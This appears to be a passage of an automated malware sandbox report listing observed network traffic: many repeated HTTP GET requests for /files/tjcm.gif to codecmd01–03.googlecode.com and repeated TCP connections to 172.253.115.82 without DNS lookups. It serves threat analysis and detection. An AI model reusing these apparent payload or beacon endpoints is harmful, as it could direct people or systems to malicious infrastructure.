                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.253.115.82
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
